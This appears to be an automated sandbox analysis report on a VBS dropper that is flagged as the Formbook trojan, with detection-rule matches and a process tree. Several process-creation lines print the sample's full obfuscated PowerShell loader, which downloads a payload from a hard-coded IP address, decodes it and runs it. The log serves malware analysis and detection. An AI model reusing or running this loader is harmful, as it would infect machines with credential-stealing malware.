        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EF0E011_2_045EF0E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451F17211_2_0451F172
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045FB16B11_2_045FB16B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0456516C11_2_0456516C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453B1B011_2_0453B1B0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454B2C011_2_0454B2C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454D2F011_2_0454D2F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D12ED11_2_045D12ED
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045352A011_2_045352A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451D34C11_2_0451D34C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E132D11_2_045E132D
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0457739A11_2_0457739A
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A9C3211_2_045A9C32
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EFCF211_2_045EFCF2
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E1D5A11_2_045E1D5A
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04533D4011_2_04533D40
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E7D7311_2_045E7D73
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454FDC011_2_0454FDC0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04539EB011_2_04539EB0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EFF0911_2_045EFF09
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04531F9211_2_04531F92
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EFFB111_2_045EFFB1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0459D80011_2_0459D800
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045338E011_2_045338E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453995011_2_04539950
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454B95011_2_0454B950
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C591011_2_045C5910
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EFA4911_2_045EFA49
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E7A4611_2_045E7A46
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A3A6C11_2_045A3A6C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045DDAC611_2_045DDAC6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045CDAAC11_2_045CDAAC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04575AA011_2_04575AA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EFB7611_2_045EFB76
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A5BF011_2_045A5BF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0456DBF911_2_0456DBF9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454FB8011_2_0454FB80
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004D307011_2_004D3070
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004CE04011_2_004CE040
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004EB01011_2_004EB010
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004CE26011_2_004CE260
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004CC2D611_2_004CC2D6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004CC2E011_2_004CC2E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004CC42911_2_004CC429
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004D47EC11_2_004D47EC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004D47F011_2_004D47F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04577E54 appears 97 times
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 045AF290 appears 103 times
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04565130 appears 56 times
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 0451B970 appears 257 times
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 0459EA12 appears 86 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 229DB970 appears 39 times
        Source: Pedido02304024.vbsInitial sample: Strings found which are bigger than 50
        Source: amsi64_7556.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: amsi32_7748.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 00000009.00000002.2260878496.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.2945407561.0000000000860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000009.00000002.2286239677.0000000023700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.2945907117.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.2945047764.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.2945916928.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: powershell.exe PID: 7556, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7748, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@19/10@5/4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\ceilometers.PriJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5irav4cj.1zm.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7556
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7748
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (c
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe 